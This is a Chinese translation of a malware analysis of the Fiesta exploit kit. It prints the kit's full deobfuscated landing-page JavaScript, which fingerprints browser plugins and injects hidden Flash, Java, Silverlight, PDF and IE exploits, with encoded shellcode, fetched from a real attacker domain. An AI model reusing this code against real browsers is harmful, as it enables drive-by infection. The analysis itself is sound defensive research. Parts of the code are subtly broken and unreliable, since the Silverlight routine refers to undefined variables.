深入分析 Fiesta Exploit Kit

0x00 前言


from:http://blog.0x3a.com/post/110052845124/an-in-depth-analysis-of-the-fiesta-exploit-kit-an

在这个文章中,我将一步步介绍Fiesta Exploit Kit是如何工作的:如何重定向,攻击感染客户端,包含一个Flash exploit,Java exploit,PDF exploit,在最后解密他的payloads.

第一步是感染我的虚拟机,幸运的是重定向页面仍然还在

image

在页面结束前,插入了一小段代码,有一点混淆,但是解码很简单:

image

exploit kit在znaaok.myftp.biz域名商,当时指向ip是92.63.87.16,在VirusTotal passivedns中查询该IP,有很多相似的域名

image

所有域名活跃时间都非常短暂,经常轮换。

0x01 The landing page


继续分析,虚拟机的浏览器每个页面都被嵌入javascript代码:

image

这个案例当中,exploit是一个Flash exploit,MD5值为f77e25d5a04d8035d49a27d1b680e35d

在VirusTotal提交样本的时候57个杀毒软件中只有3个可以识别出。

从Fiddler的请求中可以确定下面的顺序:

1
2
3
76:客户端访问页面页面
80:客户端下载flash exploit
81:客户端溢出成功后执行payload

再重新开始,当用sublime打开页面的时候,我立刻认出这是我2013年就见过的。除了上面的一些随机文本字符,JavaScript的混淆是一样的:

image

进行反混淆的工作:

1
2
3
4
5
6
1. 搜索Decrypter字符串
2. 解密所有使用过的函数跟字符串
3. 替换所有使用的变量
4. 删除所有被分割的字符串(如:var a = ‘from’+ ‘Char’ + ‘Code’)
5. 清理代码(删除未使用的变量)
6. 给变量函数易懂的命名

第一步找解密函数:

image

又去的是Fiesta没有改变解密函数,只是换了key,也可以在messop()函数中看到

image

现在怎么从哪些混淆的代码中解码呢,很简单,解密函数的的 顶部实际上是来自bonyv()函数,底部是seam9j函数,给他们换个易懂的名字。

现在可以把所有调用名字为messop()函数替换一遍:

image

正如你所看到的,开头大部分声明的变量都是全局变量。解密所有的字符串之后,我们开始替换全局变量(比如lintl变成window.document等使代码更易读一些),整理之后,页面的结构更清晰了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
#!javascript
function CheckWindowsInUA() {
    return (/Win64;/i.test(window.navigator.userAgent) || /x64;/i.test(window.navigator.userAgent));
}

function InjectScript(script) {
    var injected_element = window.document.createElement("div");
    window.document.body.appendChild(injected_element);
    injected_element.innerHTML = script
}

function InjectIframe(url) {
    var injected_iframe = window.document.createElement("iframe");
    injected_iframe.frameBorder = '0';
    injected_iframe.width = '10';
    injected_iframe.height = '10';
    injected_iframe.src = url;
    window.document.body.appendChild(injected_iframe);
    return injected_iframe
}

function isStringContainingNumber(item) {
    return (typeof item == 'string' && /\d/.test(item))
}

function ExtractVersionNumbers(data) {
    var double_num_regx = /[\d][\d\.\_,-]*/;
    var extracted_vnumbers = isStringContainingNumber(data) ? double_num_regx.exec(data) : null;
    return extracted_vnumbers ? extracted_vnumbers[0].replace(/[\.\_,-]/g, ',') : null
}

function GetTridentVersion() {
    if (!/Trident\/(\d)/i.test(window.navigator.userAgent)) {
        return 0
    } else {
        return parseInt(RegExp.$1)
    }
}

function NormalizeVersionInfo(data, vlength) {
    var templ_array = ['0', '0', '0', '0'];
    var versioninfo = ExtractVersionNumbers(data.replace(/\s/g, '')).split(',');
    for (var i = 0; i < versioninfo.length; i++) {
        if (!(/\d/.test(versioninfo[i]))) {
            versioninfo[i] = '0'
        }
    }
    return versioninfo.concat(templ_array).slice(0, vlength)
}

function IsActiveXAvailable() {
    return (typeof window.ActiveXObject != 'undefined');
}

function PadVersionInfo(vinfo, padding_size, prepend_padding) {
    while (vinfo.length < padding_size) {
        vinfo = prepend_padding ? '0' + vinfo : vinfo + '0'
    }
    return vinfo
}

function CreateFirstAvailableActiveXObject(obj_array) {
    for (var i = 0; i < obj_array.length; i++) {
        try {
            var obj = new ActiveXObject(obj_array[i]);
            if (obj) {
                return obj
            }
        } catch (exc) {}
    }
    return null
}

function GetAdobeFlashVersion() {
    try {
        if (GetTridentVersion() == 7 || IsActiveXAvailable()) { // Is it MSIE 11 or is ActiveX available
            var flash_obj = CreateFirstAvailableActiveXObject("ShockwaveFlash.ShockwaveFlash");
            if (flash_obj) {
                var versioninfo = NormalizeVersionInfo(flash_obj.GetVariable("$version"), 4);
                var padded_versioninfo = PadVersionInfo((versioninfo.slice(0, 3).join('')), 6, false);
                return [padded_versioninfo, versioninfo[3]]
            }
        }
    } catch (exc) {}
    return null
}
adobeflash_version_info = GetAdobeFlashVersion();

// Adobe Flash Player CVE-2014-8439
function AdobeFlashExploit_CVE20148439() {
    if (adobeflash_version_info != null && adobeflash_version_info[0] >= 120000 && adobeflash_version_info[0] <= 150000 && (adobeflash_version_info[0] != 150000 || adobeflash_version_info[1] < 189)) {
        var exploit_params = "piw6lxXpfkwegJaaRh9yYgEZVLcA55HsZ68S1_F1pgbBWY2pBlgF1KzoEp2_Vrzpm4QERd5HhfMQnX2YZU87ekOFPqqWr7w5gzAQpubXJNPmHRV6MQ4Kx4z5VnkuHXgvl9TEePJvZ2GWcTfa-Jns94w-fb9PKnu1OTZaAEIEUAkkUEPodUhfqXslvZJWGXBPjofZyQo5vZ-14ChOmHzf8tWNnRVXFj_bM1kY8HoQ81LvfCZAf-nWvUZAHoR8Jb9FuniDwzmiGv2HKtvV6eef-RgXRDczxIcnw5Tna20sd09SJIY3JWo7Ujo3k3U4gna2J4c2RXhKanqwSkaRwp6rt5lz4OUl2tdtRol2OdtwaG8n0P8EouyzUGHCNKZ1ClbsunXhw6_MTUhdCeNlmxiuqk65st34XERp7FIyoC9k6c5kxtoq_6cNfk8zAZLtIO2QfKm7-H2WjB3wl1i-8PkbsSx7gF2RyVPM7oLJWtHwlbfE03JHtk04dCyQaxDzONPHfvVQcGMlvD6-1TMBctB3Zmjtj9zaa8BBaMJM7ivmOqKThtGQJLil2u8XMjH0ivihNjXoYYcMNynbkB9P7VL3wvRSbks3I6f_6FWX9xp3UrejTGFjB-dDcx4lxu0Mg6Gx1PPDG6krSynCyvyPMr_DNt3GE3lgIpchO2Md7UYHb-0zbDvGQ-mwVJ58cZbi62lXVFY2ZgpJIpLgNqiia44rAIbJIvxGCt00fTn4PTOAdRDHq9XCB1RKQ_wGohmAL5ztpg52RUaYa71LyG5yuteeu7kz2ph8BpRSsdvP3dqjRluSk224GVJdBx_PZ9Qnr4yqrYica48cyGlp6JN89Jb0v9B5r6KFtlia-K9_kfkKYReic_v6GKPVLRfC0Eq8RdX6tmckvWIdfBnxjRcM-HrL3zIL3_IL39sieJ-SS1OogSemH-2uH-2iOio3F7S6VHfaxxKB7cdR3HG-kaFqPnpmuaaw3Ip2k_F8folcYRKm9kCPYvtlSutX_bdEPBA6A2ZoE90adMKiiJusiJDriJdliGmpi5g-tRleE12-CDTTxH8hx1RECR-JuaLVgheHWPZ7c0z6dSvp2-bOaLzrTSNuEWODpVITQ3O7CNZ9C4mbg4n5ZoXeC0CIzdV75R1Sk0XG5Adwoy7GrG8ZbmvDeUDM-9O7Arh1BL1k4bm7W6-KU3zHsvhrh9yN3KU2kQb_qDYsvv3V_qVEzybFz9tZxRHHUvgmfGQWUirBU4PBbnJ1uCCBV8YrgOncBNdSjJVTHJoFjkaj0JUbJkR0f4SkGIxkwjxkUyxkdyb7wYwzAuracpjrApTQfOy13sCQWTaXHpvLRkkGxz0Uy3GSAZ2pTuIReLzpCNpRoRsr6LyF2EK1Cm-1JFzCdwMOAfz-vGbDEKFKnetJoHSgpPSz95K5ucMytnRAqJkpLL2-xsrpO4xzNTvt0l9qprz5KHep8F7dOaAvNGLpW7kvW6LTxNjIPb69bYOIDS7WVwrrbS7X2H6f5HqcZzZdOQKeCBuSCqWiM5AsVaAsMcLNM4hSIltlMvZWMTWHD4lHMTlKMTly2SlJkwlTH4LYHyDSVTtSBM5mju8To61rciGw8DpauEsb-Mh91Ib5oiFXzOenZ4Se24gJGFYNqOk58i0Wm6ePAnNNmntsEe2zE8PRH0SWZmxpIhm6eT-rV4c-QlKrOsJcDP4lqNQbuMu3_K6xb6pNkq9zwFNLrLDjgR8v-UMWNjGimNfBEtjqQsjqQsjFD4mkrbWVPaU1IQ53gG--JQrclHKyzNcRWJu1LJeSDtZRIsh4gO5GxF5KCTrGxvllxJIQCBrzMBLtxBMwIBhsZQqwZyZeOvkcZ4ZwIvCeMqtUMtxaMtWKMOOaISW7MBWNCS-WqcWYqFOyOsCv";

        var exploit_inject_script = "<object width=10 height=10 id='swf_id' type='application/x-shockwave-flash'><param name='movie' value='twQHU'/><param name='allowScriptAccess' value='always'/><param name='FlashVars' value='buys0=r_SET&softq='/><param name='Play' value='0'/></object>";
        exploit_inject_script = exploit_inject_script.replace('r_SET', exploit_params);

        var exploit_url = "http://znaaok.myftp.biz/ai_qkvu2/1f247c512126d3ff04500b0f005802090150020f0301050a0452500202515409";
        exploit_url = [exploit_url, adobeflash_version_info[0], adobeflash_version_info[1]].join(';'); // Insert flash major and minor version numbers in URL

        exploit_inject_script = exploit_inject_script.replace('twQHU', exploit_url); // Insert payload URL
        InjectScript(exploit_inject_script);
    }
}
AdobeFlashExploit_CVE20148439();

// Adobe Flash Player CVE-2014-0497
function AdobeFlashExploit_CVE20140497() {
    if (adobeflash_version_info != null && adobeflash_version_info[0] >= 110000 && adobeflash_version_info[0] < 120000) {
        var exploit_params = "Uty7aGiUrcYF-SKBlUybGiX686yCWAJYkL2tmkcj2hQ6Ter1eQxHH4Ox79uRvZ7Ysf6TNwwD9jGIyAsRUo7uhbiATr4LFUH9Y1MS2cYV7INrs7tmRr-pqrCIvFJ71qMTM19LJqkTyDecQ9pz2kCODWKrBfNdLSL-jPcqt7jVZTqSZarovw2fxsylV_kWfFZ-99AavMpGyB4jQVvpMqxz4HVRS4xQrs_asQkzKVoSK5sTWHiAWyKWCziAxkr8IEJlSFD-WI2_Z5hGBzkSv4TzqxxQH9bf6sZp_-JpgBVQvFFt3N7T3_jjeYjTIs0dNq6AnASAC68b5IVtlJ-_WoR-pQga8IoKGCdsHylRpYtNgjH0BOqEbYpzeLtCgqS15FsWc0ImzK-UB02_E4HxM1R7-JsIMhRXB6RYCUIjAq98YiW8g8-MD3T1G2C2KWdDktmYGF2O2bmsVZFJwxG-uLLbMct7YpdRVvdpCwu45rwNOLiL36ZgqgEXYaeP3j22L4LTTGCYCyged2SLY9xBCzQ3jiUtZRQa1lB61QJ0wev8JVsq18cyObjKbGxnlpeVYNDmgpIn14BUR7KyEZIvICcT_5z0f_ZTcXgixd7VYBxPRQ7CsjyWlyAFuy6-qrp6NZKjHRLEh9Jux7xAM5SPy_2DizdG5K9gcSZ0A5AIeYb6Ny3FNBtNvyXHvDz3utZ2-8N1v9s3U8ow7oN0RHGage3OOngVcDCo7n0nb-nJh-OxE7MGNfmUW5UlMe7NcuPMH96cSo43MutQlyI-kKkdVz9jky52Gc-BXc_tMw4-JwF1NnjtEZIX_qOyPQCQLotvtA79tEmtlmhtkKnINkM3QkDV3TLeFATqpribq-9iEakq177_CWt6_XMVZ5uC4b48atIZrQBF4gX_gZxjI-y6rq2evtVevNgevEsth8-hxbOl7m7zuyIeuyIwD9ETpiOAvIMBqJNazoLPrquLG6RFmIaDk6pHvWViuNqdbYKW1Glrhgh31xvrVYvyQjA9b-XA97Bn61UBPQG82kRW2k_-2kEKNKRxNLIrpGlN5b2PdqTqiCVii5UEd70JcUgVNOHHhzSOuG6ZPoeIiju7zx-OJwA75littbf00GsZ78c5diDa-pP94emjdF_5_lruCbC3IJjvCquJDXyvfKD6FikDB0_MqTz7OkR1XqoS8VDv7jrbC6H6Ox1-EfFGydRiIPZRxtsWVnEfGDCDf7IkfT1Cs-r2W5OFbEtIWeryWmPyctJf2Hhypt9-jPDZLuABT0pJx0xkTUtxO8Vy-JugWe7hhngh_XghWA0hJAYb_UHcMw-ZZ4udM4sXgPFYyX_Xh07Q1K5-aCJvSgUMMEjzQBOprdJRhPrp7h0Rz9smxHyliGKfUSpfT05UPUPsKZ5rVVcm7CH5JMawbPZ0OL6ShvwI5T1dxMkFrQdKkCTJtFeBwS7j66QXLQsI2nvMAc69QLtaDnIGg8mIBDKGBHtHgswjhKdkgs8jl4J7QYj0g4lDwbkLuZtNUklKplcRqFAAqdt9kijWHIjWDRD4D7OzLbPKDW_7O92wlYgwOaIHOaIZewIeRcO5usMSuKIY5t5YLyFuTHRHFn0uTWJJCfZBXVVooiGhznUua0bQ15OUIYHJeY3ehSGFdvOPKURnsJ65K6Jrs6WW72PSoO2PWEosNfBx2V4tE9T-QYnrVWL0MeiNF1_SmWv958ARGyeC2JEJIdKQoPJ-twLx2Z_Gp85sbPpaAsF8ez4MVeRMVe-dlYU_ivlOE9EZ0ltFp7U4lKCfJokpWfOPzXDX8Pqz_HrPVb1oxHNpWNbpWyyotBjwtQKSEvjFuqISEtOXutxfLslXDoOXDROtD_Wk1R5l1HCbVwPaVH17ObvGZrNyOxLsW-jY6olt6sI6Ae1l";

        var exploit_inject_script = "<object width=10 height=10 id='swf_id' type='application/x-shockwave-flash'><param name='movie' value='xVpWi'/><param name='allowScriptAccess' value='always'/><param name='FlashVars' value='talkh=P69jl&diadx='/><param name='Play' value='0'/></object>";
        exploit_inject_script = exploit_inject_script.replace('P69jl', exploit_params);

        var exploit_url = "http://znaaok.myftp.biz/ai_qkvu2/44f7aa1e1db111d0000d510c565a065d0402560c5503015e010004015453505d";
        exploit_url = [exploit_url, adobeflash_version_info[0], adobeflash_version_info[1]].join(';'); // Insert flash major and minor version numbers in URL

        exploit_inject_script = exploit_inject_script.replace('xVpWi', exploit_url); // Insert payload URL
        InjectScript(exploit_inject_script)
    }
}
AdobeFlashExploit_CVE20140497();

// Get the highest available Java version
function GetHighestJavaVersion() {
    try {
        var jvms = null;
        var java_object_class_ids = ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA", "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"]; // Initiates the Java Deployment Toolkit
        for (var clsid_i = 0; clsid_i < java_object_class_ids.length; clsid_i++) {
            var java_object = window.document.createElement("object");
            java_object.setAttribute("classid", java_object_class_ids[clsid_i]);
            if (typeof java_object["jvms"] != 'undefined') {
                jvms = java_object["jvms"];
                break
            }
        }
        if (jvms != null && jvms.getLength() != 0) {
            var version = 0;
            for (var jvm_i = 0; jvm_i < jvms.getLength(); jvm_i++) {
                var jvm_verion_info = NormalizeVersionInfo(jvms.get(jvm_i)["version"], 4);
                var c_version = parseInt(jvm_verion_info[1].concat(PadVersionInfo(jvm_verion_info[3], 2, true)), 10);
                if (c_version > version) { // Check if this version is higher than the previous
                    version = c_version
                }
            }
            return version
        }
    } catch (exc) {}
    return null
}
java_version = GetHighestJavaVersion();
java_enabled = window.navigator.javaEnabled();

// Java Runtime Environment CVE-2013-2465
function JavaExploit_CVE20132465() {
    if (java_enabled) {
        if ((java_version && java_version > 630 && java_version < 722) || (!java_version && java_enabled)) {
            var exploit_inject_script = "<applet width=10 height=10><param name='cent' value='http://znaaok.myftp.biz/ai_qkvu2/44075e88a64ef0cd574c550c025e0f000402000c010708030100520100575900;1;3@@'/><param name='jnlp_href' value='http://znaaok.myftp.biz/ai_qkvu2/49efdc53b7b51fa25e57095d5358020b040f555d50010508010d07505151540b'/></applet>";
            if (java_version && java_version >= 710) { // Since 7u10 bundling has to be selected for self contained applications (https://blogs.oracle.com/talkingjavadeployment/entry/packaging_improvements_in_jdk_7)

                exploit_inject_script = exploit_inject_script.replace("</applet>", "<param name='javafx_version' value='2.0+'/></applet>")
            }
            InjectScript(exploit_inject_script)
        }
    }
    return
}
JavaExploit_CVE20132465();

// Java Runtime Environment CVE-2012-0507
function JavaExploit_CVE20120507() {
    if ((java_version && java_version < 631) || (!java_version && java_enabled)) {
        // Hex encoded string, contains non-ascii characters
        var exploit_param = "aced0005757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000002757200085b4c6c6170736b3bfe2c941188b6e5ff02000078700000000170737200306a6176612e7574696c2e636f6e63757272656e742e61746f6d69632e41746f6d69635265666572656e63654172726179a9d2dea1be65600c0200015b000561727261797400135b4c6a6176612f6c616e672f4f626a6563743b787071007e0003";

        var exploit_inject_script = "<applet archive='http://znaaok.myftp.biz/ai_qkvu2/5b76b7bdcefb3f0d5410560d550c555c0554070d5655525f005655005705035c' code='vailt' width=10 height=10><param name='ptas' value='http://znaaok.myftp.biz/ai_qkvu2/5230fd54a64ef0cd564a560b515f020c0504030b5206050f000651065356540c;1;2@@'/><param name='hamm' value='JRgN_'/></applet>";

        exploit_inject_script = exploit_inject_script.replace('JRgN_', exploit_param);
        InjectScript(exploit_inject_script)
    }
    return
}
JavaExploit_CVE20120507();

function PadNumber(number) {
    return (number < 10 ? 0 : '') + number.toString()
}

function FormatVersionString(vdata) {
    return (vdata[0] + '.' + vdata[1] + '.' + vdata[2] + PadNumber(vdata[3]) + PadNumber(vdata[4]))
}

function IsSpecifiedVersionSupported(obj, v_array, index, new_vnumber) {
    var nversion = v_array.slice(0);
    nversion[index] = new_vnumber;
    return obj.IsVersionSupported(FormatVersionString(nversion))
}

function GetSilverlightVersion() {
    var sl_plugin = null;
    var sl_descr = null;
    try {
        if (GetTridentVersion() == 7 && (sl_plugin = window.navigator.plugins["Silverlight Plug-In"])) { // MSIE 11 available and Silverlight
            sl_descr = sl_plugin["description"]
        } else if (GetTridentVersion() == 7 || IsActiveXAvailable()) { // MSIE 11 available and ActiveX
            var sl_obj = CreateFirstAvailableActiveXObject(["AgControl.AgControl"]);
            var supported_version = [1, 0, 1, 1, 1]; // Base version
            var version_supported = 0;
            var highest_version = [6, 2, 9, 12, 31]; // Highest version we go to
            if (sl_obj && sl_obj.IsVersionSupported(FormatVersionString(supported_version))) { // Lowest version is available

                // Following section bumps version numbers untill it hits one not supported
                for (var i = 0; i < highest_version.length; i++) {
                    for (var version_num = supported_version[i] + (i == 0 ? 0 : 1); version_num <= highest_version[i]; version_num++) {
                        if (!IsSpecifiedVersionSupported(sl_obj, supported_version, i, version_num)) {
                            break
                        }
                        version_supported++;
                        supported_version[i] = version_num
                    }
                }
                if (version_supported) {
                    sl_descr = FormatVersionString(supported_version)
                }
            }
        }
        if (sl_descr) {
            return NormalizeVersionInfo(sl_descr, 3).join('')
        }
    } catch (exc) {}
    return null
}
silverlight_version = GetSilverlightVersion();

// Microsoft Silverlight CVE-2013-0074
function SilverlightExploit_CVE20130074() {
    if (silverlight_version >= 4050401 && silverlight_version < 5120125) {
        var exploit_inject_script = "<object data='data:application/x-silverlight-2,' type='application/x-silverlight-2' width=10 height=10><param name='source' value='j2VIH'/><param name='initParams' value='pave=YOsTWLl1BQAASYA0CB+FyXX3/9Bhw+jo////9pMbHx9BluySTLemQW6kT6dtf2hrTfebHB8f45boso78C/eZHB8fjbKO/O2Wz/ewHB8ftPTtpqZsLsina36rH3Uf90ccHx/3IRwfH4jgTAsjGW0rT0t1F3Xg4EwnRY78OE9Ldx8PHx9IdQZN4Ewjjkf8CpQYEKlXHlaSW5cXlBef4j9sHOFcsfdrHR8fjvxtLt+zmt9rSk9I4ExfSUhI4ExbRx7Z9+ceHx+O/Ep1FEdXa1BPn2SxHmsO96YeHx+a32o84Ax5IvsdavufZPIfahJI9ywfHx+a32oU4Vzy9wweHx+O/NZHsh7Z9LuIkmxnSbMmIWrk2BkkLh8fQffgHh8f3HUfdeHgTBtJSEqW+qZEizSL94sdHx+O/GFOkkyHTeBMK5rfa22UTyOW2ZbYHJsPnx8fH5QX/H9/HG8TLt+G5vfJHR8fauee5UFupE9+axqc3wv0wOBvDx7RLtZWXrKa32sqSZJrGB0u34bn97UdHx9q557lSGvf60Fq/kEe4ZQrkUaUTiOUWw4DHFMOMx7XJtFtGybZaRcu39ZAQd0bH0mUag9JsprfauSY6EGSTIFNSeBMT478/05OTuBMU0bZHh9PSUjgTFtH2R9DSEhJmOGymt9q5HVgSeBML5IjGZJcsE9I4EwTdR9J4ErjnOcAaLf0u0lISpb6luGymt9q5ElIkmTxmOGzebSb32rmkmDhSOBMM0jgTFdBdSNGNtOW+E5ILt/stUCQGHVsd3Effh93bR9qH5Z4E6Zwii4Pp7APFLf3Sh4fH5ZYF3V6d3ofZx93ex8xH3d8H3IflngPlmgLprQ7yMinaf7w2Uj3NB4fH9ZAQdxISpb6dUtGNtOW5Zb4SC7f7LVAklAPdVuQHkhOT09PT09PT03gTDfWQNxISS7fT091Hk91HHUcSOBMB19rBleIsnUfS09JSOBMA5rfaxZI4Ew/SOBMO19BQNxJTJbhLt+G4dk2zh7ISE4uxIbh3JUbAR/dmRsJlxsBHRsJlRsZLRi1/fdGQERB3Eou1k6W/U5OTUlOpsKTvginsiHO3vebHx8fQprfanma4Gt7lFofdR9ISuBPL5rfakuUWBea32tST0tP91YfHx+JSUqUWh/gTxNGmt9qKLKNsi7PIllMS09qNLIuzybXajuyLs9PmOic9g/3feDg4E5IdR/gTBdGJtdqFeApSeBMM5jo9B0u30Lcph8PHx+a32odltd1X05PdR/gTA/cT/cXHx8fRvcoHx8f4P9ISUwu4HuUYC+UYBOUYAuW5C7fhpQgJuRrCJRoN5rpa+/m91YfHx+zaugm1ZRYD2r/REFA3H+UTyOW3JbZTxxbD2cu8lp/HEc/HCu0Lt+G5/cEHx8faucm1X5q9xxHOxCoM3QcbwNHHBuxlls7A37cs2wZI35tHTM/3tUSHt2b39x3c3ZxdB9DH1MfcB9oHx8fam1zcnBxH0N8cnsxemd6FkMxMUNxcGt6b357MXpnej8wfD98cG9mPzBGPz06TD0/PTpMPT85OT9sa35taz89PT89Okw9HzB8P2xrfm1rPz09Px/3cOTg4Ll0isDKtC6cZPXeY6eQEWqGpOn/Hx8fH0FupE9hkrtN02ERFB//xKJMX+DXg6DWMfNgx6CAql/rxUORTzTYEtFtf2hrHx8fH0AXpkTq12UnxMHJbR8fHx9IRFR8AYp0mHDjKDuW06LXAA+M9PV/mKQfHx8fHx8fH3dra28lMDBlcX5+cHQxcmZ5a28xfXZlMH52QG50aWotMC4sfih+KC96KXsrKnx5KX0qLSssL34vfCopL3wvKCp7Ly4vKiouL3wqKioqLy8qei8rLygvLC8uKisvKiouKnskKh8fHx8='/></object>";

        var exploit_url = "http://znaaok.myftp.biz/ai_qkvu2/2b6b367b48844f2e410e4059040d005a0254065907540759075654540604565a";
        exploit_url = [exploit_url, silverlight_version].join(';'); // Insert Silverlight version numbers in URL

        exploit_inject_script = exploit_inject_script.replace('j2VIH', jnv);
        InjectScript(pa)
    }
}
SilverlightExploit_CVE20130074();

// Microsoft Internet Explorer CVE-2013-2551
function MSIEExploit_CVE20132551() {
    var fut, om;
    var trident_version = GetTridentVersion();
    if (        !CheckWindowsInUA() &&
                (       trident_version == 6 || // Trident version 6, identifies Internet Explorer 10
                        trident_version == 5 || // Trident version 5, identifies Internet Explorer 9
                        trident_version == 4)) // Trident version 4, identifies Internet Explorer 8
    {
        InjectIframe("http://znaaok.myftp.biz/ai_qkvu2/40319b9a99f7cc915d555f0a0e590e590406030a0d00095a010451070c505859");
    }
    return
}
MSIEExploit_CVE20132551();

function GetAdobePDFVersion() {
    try {
        // If its MSIE 11 or ActiveX Controls are available instanciate PDF object, otherwise null
        var activex_obj = (GetTridentVersion() == 7 || IsActiveXAvailable()) ? CreateFirstAvailableActiveXObject(["AcroPDF.PDF", "PDF.PdfCtrl"]) : null;

        var pdf_obj = window.document.createElement("object");
        pdf_obj.setAttribute("classid", "clsid:CA8A9780-280D-11CF-A24D-444553540000"); // Initiates the 'pdf.ocx' ActiveX control
        pdf_obj.setAttribute("src", '');

        var version_string = null;
        try {
                // Get version of either one of the valid objects
            version_string = (activex_obj || pdf_obj).GetVersions()
        } catch (exc) {}
        if (version_string) {
            var version_extract = version_string.match((/=\s*[\d\.]+/g));
            var version = 0;
            for (var i = 0; i < version_extract.length; i++) {
                var c_version = parseInt(NormalizeVersionInfo(version_extract[i], 3).join(''), 10);
                if (c_version > version) {
                    version = c_version
                }
            }
            return version
        }
    } catch (exc) {}
    return null
}
adobepdf_version = GetAdobePDFVersion();

// Adobe PDF CVE-2010-0188
function AdobePDFExploit_CVE20100188() {
    var triden_version = GetTridentVersion();
    if (triden_version == 4 || triden_version == 5) { // Check for MSIE 8 or 9
        if ((adobepdf_version >= 800 && adobepdf_version < 821) || (adobepdf_version >= 900 && adobepdf_version < 931)) {
            var exploit_inject_script = "<object classid='clsid:CA8A9780-280D-11CF-A24D-444553540000' width=10 height=10><param name='src' value='irH3d'/></object>";

            var exploit_url = "http://znaaok.myftp.biz/ai_qkvu2/6b2f2de7ba83a9dc5a0b505d055f520f0654025d0606550c035650500756040f";
            exploit_url = [exploit_url, adobepdf_version].join(';'); // Insert Adobe PDF version numbers in URL

            exploit_inject_script = exploit_inject_script.replace('irH3d', exploit_url);
            InjectScript(exploit_inject_script);
        }
    }
    return
}
AdobePDFExploit_CVE20100188();

看一下Fiesta使用了哪些漏洞:

Adobe Flash

1
2
CVE-2014-8439: Adobe Flash Player before 13.0.0.258 and 14.x and 15.x before 15.0.0.239 on Windows and OS X and before 11.2.202.424 on Linux, Adobe AIR before 15.0.0.293, Adobe AIR SDK before 15.0.0.302, and Adobe AIR SDK & Compiler before 15.0.0.302
CVE-2014-0497: Adobe Flash Player before 11.7.700.261 and 11.8.x through 12.0.x before 12.0.0.44 on Windows and Mac OS X, and before 11.2.202.336 on Linux

Adobe PDF

1
CVE-2010-0188: Adobe Reader and Acrobat 8.x before 8.2.1and 9.x before 9.3.1

Java

1
2
CVE-2012-0507: Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, and 5.0 Update 33
CVE-2013-2465: Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7

Silverlight

1
CVE-2013-0074: Microsoft Silverlight 5, and 5 Developer Runtime, before 5.1.20125.0

Microsoft Internet Explorer

1
CVE-2013-2551: Microsoft Internet Explorer 6 through 11

有趣的是,Fiesta exploit kit完全专注的IE浏览器,检测到Adobe PDF, Adobe Flash, Java插件也只是用于IE。

0x02 Following the flash exploit landing page trail


通过网络抓包可以确定虚拟机是被用的FLash exploit攻击,通过对比URL看到使用的是CVE-2014-8439。

这个CVE最初由kafeine在Angler exploit kit中以0day的方式发现的。CVE-2014-0569 (Flash Player) integrating Exploit Kit Out-of-Band Flash Player Update for CVE-2014-8439

反编译ActionScript代码之后,我们找到一段脚本:

image

整理之后代码:

image

截图显示的不是很完整,有一个函数没有展示出来LoadComplete函数:

image

stage 2的数据追加到root/main对象中,stage 2实际上是另外一个flash文件,通过addChild函数,stage 2 flash文件将会被激活,从内存当中dump出来解密的stage 2数据,我们可以看到Flash文件的头:

image

反编译这个FLash文件获得了大约820行的ActionScript代码,我不打算针对这个漏洞继续深入他是如何利用的,如果你想知道是如何利用的已经有人写过相关文章 An interesting case of CVE-2014-8439 exploit

截图当中的ActionScript代码只是第一步打包加载的作用,第二步才是真正的利用漏洞获取执行权限,为了获得执行权限,垃圾收集器的

垃圾收集器内部有一指针指向一个ITelemetry对象,通过一个包含精心准备构造虚拟表的ITelemetry对象能够获得执行权限,修改虚拟表后的ITelemetry,替换了正确的ITelemetry函数,指向了我们的shellcode。

反编译完嵌入的flash文件(第二步中)之后,我们得到了一个简单的as脚本,发现了一个有趣的函数initialization,代码引用目标网页上的一个变量,然后调用了一些函数:

image

如果我们跟踪seatk函数,看到了跟之前很类似的代码,是一个字符串解密函数:

image

看来Fiesta把同一个加密混淆的函数用在了很多地方,函数返回解码后的数据就是结合ROP链利用的shellcode。

由于这个flash漏洞(CVE-2014-8439)是刚刚发现的,POC并没有放出来,所以我不会泄露利用的细节。

现在已经知道了Fiesta现在的使用的攻击:

登陆页面给使用哪个shellcode/payload提供信息 exp有打包来应对检测 第3阶段的exp显示他是一种可以很容易置换的框架

接下来讲一下针对Java 的exp

0x03 JAVA payload解密


该java的exp样本基于CVE-2013-2465

5c6c4a6a4c5adc49edabd21c0779c6e3

我们可以从登陆界面发现,‘JavaExploit_CVE20132465’ 功能,对java applet进行如嵌入。

在我们反编译jar包之后我们可以得到一份存在一些混淆的java源码,审查源码我们可以发现,其中一个功能在于下载payload并执行。对java源码进行处理后如图片所示我们可以一份清晰的源码。

image

让我们先看函数的顶部,我们可以发现exp似乎对不同的payload提供了支持。

下载payload之后读取前256个字节,其中包括了xor key以及payload的有效部分,我们可以在虚拟机中分析这256个字节的差异。

image

其中我们可以看到关键的java代码在于 “Decrypt” 功能,用于payload的解码,在还原java源码之后,这部分函数如下图所示:

image

代码的第一部分使用两个index把需要解密的每字节数据递增,两个index中key的值被交换,相加掩藏在形成为XOR运算的关键位置。

